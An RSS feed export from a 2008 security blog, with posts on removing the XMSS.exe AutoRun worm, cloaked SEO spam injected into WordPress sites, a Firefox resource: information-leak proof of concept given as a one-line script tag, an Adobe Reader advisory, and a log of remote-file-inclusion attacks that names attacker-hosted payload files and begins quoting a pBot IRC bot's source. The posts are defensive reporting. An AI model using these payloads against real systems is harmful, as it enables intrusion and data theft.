<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Security</title>
	<atom:link href="http://42.kaizeku.com/topics/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>How to remove XMSS.exe Win32 AutoRun worm</title>
		<link>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/</link>
		<comments>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/#comments</comments>
		<pubDate>Sat, 16 Feb 2008 11:58:21 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[autorun.abt]]></category>

		<category><![CDATA[autorun.fj]]></category>

		<category><![CDATA[autorun.m]]></category>

		<category><![CDATA[prank]]></category>

		<category><![CDATA[Virus]]></category>

		<category><![CDATA[win32]]></category>

		<category><![CDATA[xmss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/xmss-exe-funny-ust-scandal-avi-worm/</guid>
		<description><![CDATA[

Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &#38; crashed System Internal Process Explorer (procxp.exe).
Its not a funny video
According to McAfee, this worm is known as W32/Autorun.worm.g.
It can propagate itself over [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/xmss-exe-funny-ust-scandal.png' alt='xmss-exe-funny-ust-scandal.png image by chaoskaizer' width='128' height='128' class="photo thumb- fl rgb-"/>Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as <em>xmss.exe</em>. It copied itself on Local disk and Windows Directory <small>(%Windir%)</small>. Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &amp; crashed System Internal <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" class="exturl icn-r1" rel="nofollow robots-nofollow">Process Explorer</a> (procxp.exe).</p>
<h2 class="cb">Its not a funny video</h2>
<p class="xmssexe-descriptions">According to <a href="http://vil.nai.com/vil/content/v_143758.htm" rel="nofollow" class="exturl icn-r1">McAfee</a>, this worm is known as <strong><tt class="di">W32/Autorun.worm.g</tt></strong>.</p>
<blockquote cite="http://vil.nai.com/vil/content/v_143758.htm"><p class="cite">It can propagate itself over removable media and network drives and cause execution of malicious code via an <tt class="di">autorun.inf</tt> file.</p>
</blockquote>
<p><span id="more-217"></span></p>
<h2 class="mgt mgb-">XMSS.exe Win32 AutoRun Files</h2>
<ul class="xoxo exturl">
<li><strong class="fw-"><tt class="di">x:autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<h2 class="cb mgt">Fixes Win32 AutoRun.* Worm</h2>
<p>Here&#8217;s a few step to prevent <strong class="fw-">Win32 AutoRun Worm</strong>. </p>
<ol class="xoxo">
<li>Disabled System Restore for Temporary - <a href="http://support.microsoft.com/kb/264887/en-us" class="exturl icn-r1" title="How to Enable and Disable System Restore">KB 264887</a></li>
<li>Boot Windows in Safe Mode - <a class="exturl icn-r1" href="http://support.microsoft.com/kb/315222" title="Safe Mode Boot options in Windows XP">KB 315222</a></li>
<li>
<p>In Windows Safe Mode, Open Windows Registry Editor</p>
<p><tt class="di">Windows Start > Run > Regedit</tt></p>
<li>
<p>Browse to the following registry settings &darr;</p>
<p><tt class="di">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</tt>
</li>
<li>Replace<br />
<em><tt class="di">explorer.exe, xmss.exe</tt></em> with <em><tt class="di">exporer.exe</tt></em><br />
<img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/xmss-exe-regedit.png' alt='xmss-exe-regedit.png' width="708" height="378" class="mgt mgb" />
</li>
<li>Delete all the following files
<ul class="xoxo">
<li><strong class="fw-"><tt class="di">C\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<p class="notice">%Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive</p>
</li>
<li>Clean All Windows Temporary Files</li>
<li>Restart Windows</li>
</ol>
<h2 class="cb">XMSS.exe Win32 Autorun Variants</h2>
<p><small>VirusTotal.com - Dec 2007 Results.</small></p>
<table border="1">
<tr>
<td>Antivirus</td>
<td>Version</td>
<td>Last Update</td>
<td>Result</td</tr>
<tr>
<td>AhnLab-V3</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AntiVir</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Authentium</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Avast</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AVG</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>BitDefender</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.AutoRun.abt</td</tr>
<tr>
<td>ClamAV</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Autoit-6</td</tr>
<tr>
<td>DrWeb</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>eSafe</td>
<td>-</td>
<td>-</td>
<td style="color: red;">suspicious Trojan/Worm</td</tr>
<tr>
<td>eTrust-Vet</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Ewido</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>FileAdvisor</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Fortinet</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Autoit.BG!tr</td</tr>
<tr>
<td>F-Prot</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Trojan!c4a4</td</tr>
<tr>
<td>F-Secure</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>Ikarus</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>Kaspersky</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>McAfee</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Microsoft</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>NOD32v2</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Win32/HackAV.P</td</tr>
<tr>
<td>Norman</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Panda</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Suspicious file</td</tr>
<tr>
<td>Prevx1</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.DoS.Win32.Opdos</td</tr>
<tr>
<td>Rising</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.Win32.Autorun.jax</td</tr>
<tr>
<td>Sophos</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Sunbelt</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Symantec</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>TheHacker</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan/Autoit.bg</td</tr>
<tr>
<td>VBA32</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>VirusBuster</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.AutoIt.BB</td</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Riskware.HackAV</td</tr>
</table>
<h2 class="mgt mgb-">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://support.microsoft.com/kb/264887/en-us">How to Enable and Disable System Restore</a></li>
<li><a href="http://support.microsoft.com/kb/315222">Safe Mode Boot options in Windows</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Blackhat SEO Spammer targeting High PR WordPress Blog</title>
		<link>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</link>
		<comments>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 20:14:48 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[css cloacking]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</guid>
		<description><![CDATA[thinkingphp.org (PR6) &#038; jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />I&#8217;ve been monitoring <span class="vcard"><a class="url fn microformat icn-r1" href="http://mattheaton.com" title="bluehost &#038; hostmonster CEO">mattheaton.com</a></span> &#8220;<strong class="fw-">wordpress.net.in goro spam injections</strong>&#8221; for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO's Official Blog Hacked">Wordpress.net.in Spam injection</a>&#038; <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Gaming Bluehost &#038; Hostmonster CEO&#8217;s Blog</a>.</p>
<p><a href="http://thinkingphp.org" class="exturl icn-r1" title="thinkingphp.org">thinkingphp.org </a><small>(PR6)</small> &#038; <a href="http://jensfrake.com" title="jensfrake.com" class="exturl icn-r1">jensfrake.com</a> <small>(PR7)</small> has been hijacked by &#8220;Wordpress Blackhat SEO Spammer&#8221; for this month. Both sites were running on <strong>WordPress 2.3.2</strong>. </p>
<p>By now the <strong class="fw-"><em title="id goro">&lt;div id=&#8221;goro&#8221;&gt;</em></strong> signature has been replaced with &#8220;Inline CSS&#8221; wrapper.</p>
<h3>Cloacking Check on Mattheaton.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>32,246 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-source.txt' title='mattheaton-com-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-source.txt</a></dd>
<dt>Google bot</dt>
<dd>34,646 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-googlebot-source.txt' title='mattheaton-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-googlebot-source.txt</a></dd>
<dt>Difference</dt>
<dd>2,400 characters</dd>
</dl>
<p><span id="more-209"></span></p>
<h3>Cloacking Check on jensfrake.com &#038; blog.jensfrake.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>59,580 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blogjensfrakecomsource.txt' title='blogjensfrakecomsource.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom.txt</a></dd>
<dt>Google bot</dt>
<dd>59,699 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blog-jensfrake-com-googlebot-source.txt' title='blog-jensfrake-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom-googlebot.txt</a></dd>
<dt>Difference</dt>
<dd>119 characters</dd>
</dl>
<p class="notice">While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site</p>
<p>This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px). </p>
<p><small>another mathematical jokes, l33t.</small></p>
<pre>
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;
</pre>
<h5 class="mgb-">What&#8217;s new with Goro spam 2008</h5>
<ul class="xoxo exturl">
<li>WordPress <= 2.3.2 is vulnerable to this attack. </li>
<li>Inject Spamlinks wrap with extra Inline CSS for cloacking</li>
<li>Target High PR Sites &rarr; PR5 and above</li>
</ul>
<h5 class="mgt mgb-">Related Post</h5>
<ul class="xoxo exturl">
<li><a class="inturl" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked">Matt Heaton BlueHost HostMonster CEO&#8217;s Official Blog Hacked</a></li>
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed Wordpress.net.in Spam Injection">How to Removed Wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h3 class="mgt">External Links</h3>
<ul class="xoxo exturl">
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" title="National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities">National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firefox 2.0.0.12 Information Leak</title>
		<link>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/</link>
		<comments>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/#comments</comments>
		<pubDate>Sun, 10 Feb 2008 11:21:37 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/firefox-20012-information-leak-vulnerability/</guid>
		<description><![CDATA[

We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme
view-source:resource:///
translate to file:///C:/Program%20Files/Mozilla%20Firefox/
You can read/include firefox pref settings with this code. &#60;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&#62;&#60;/script&#62; 
Workaround
Install No-script Add-ons.

Credits
Ronald van den Heetkamp at 0&#215;000000
External Links

Firefox 2.0.0.12 Information Leak POC


]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg' alt='Marvin Apbot costume by chaoskaizer' width="100" height="100" longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg" />We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme<br />
<tt class="di">view-source:resource:///</tt><br />
translate to <tt class="di">file:///C:/Program%20Files/Mozilla%20Firefox/</tt></p>
<p>You can read/include firefox pref settings with this code. <tt>&lt;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&gt;&lt;/script&gt; </tt></p>
<h2 class="cb">Workaround</h2>
<p>Install <a class="exturl icn-r1" href="http://noscript.net/">No-script</a> Add-ons.</p>
<p><span id="more-197"></span></p>
<h2>Credits</h2>
<p><span class="vcard"><a class="url fn microformat icn-r1" href="http://www.0x000000.com/index.php?!=6"><span class="given-name">Ronald</span> <span class="family-name">van den Heetkamp</span></a> at <a class="url org exturl icn-r1" href="http://www.0x000000.com">0&#215;000000</a></span></p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r1" href="http://www.0x000000.com/index.php?i=515">Firefox 2.0.0.12 Information Leak POC</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adobe Acrobat, Acrobat 3D &#038; Reader Multiple Vulnerabilities</title>
		<link>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</link>
		<comments>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:35:38 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[acrobat]]></category>

		<category><![CDATA[acrobat3d]]></category>

		<category><![CDATA[adobe+reader]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[reader]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</guid>
		<description><![CDATA[One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code. The code will run with the privileges of the target user opening the PDF document.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png' alt='adobe reader' longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png" width="110" height="110" title="Adobe Reader" class="photo thumb- fl" />A JavaScript <a class="exturl icn-r1" href="http://en.wikipedia.org/wiki/Buffer_overflow">Buffer Overflow</a> in <strong class="fw-"><a href="http://www.adobe.com/products/acrobat/">Adobe Acrobat</a></strong>, <strong class="fw-"><a href="http://www.adobe.com/products/acrobat3d/">Acrobat 3D</a></strong> &#038; <strong class="fw-"><a href="http://www.adobe.com/products/reader/">Reader</a></strong> allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document. </p>
<p>Excerpt from <em>iDefense </em>Public Advisory;</p>
<blockquote cite="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656"><p class="cite">Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.</p>
</blockquote>
<h2>Workaround</h2>
<p>Disabled Adobe Reader &#038; Acrobat JavaScript. Perform Update &darr;</p>
<h2>Update -Adobe Acrobat &#038; Reader version 8.1.2 </h2>
<p>Adobe released version 8.1.2 of Adobe Reader, Acrobat &#038; Acrobat 3D to address<br />
these vulnerabilities.</p>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/go/getreader" title="Download Adobe Reader 8.1.2">Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849" title="Download Acrobat 8.1.2 for Windows">Acrobat 8 users on Windows update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3856" title="Download Acrobat 8.1.2 for Mac">Acrobat 8 users on Macintosh update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3850" title="Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2">Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2</a></li>
</ul>
<p class="mgt">These <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656" class="exturl icn-r1" >vulnerabilities</a> were discovered by <span class="vcard"><a href="http://labs.idefense.com/" class="url fn microformat icn-r1"><span class="give-name">Greg </span> <span class="family-name">MacManus</span></a> of <span class="org"><a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655">VeriSign iDefense Labs</a></span></span>. </p>
<p><span id="more-194"></span></p>
<h2>Related Posts</h2>
<ul class="xoxo exturl">
<li><a class="inturl" href="/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/" title="How to safely remove AcroRd32Info.exe">How to safely remove AcroRd32Info.exe (Adobe Reader)</a></li>
</ul>
<h2 class="mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/support/security/advisories/apsa08-01.html" title="Security update available for Adobe Reader and Acrobat 8">Security update available for Adobe Reader and Acrobat 8 (APSA08-01)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
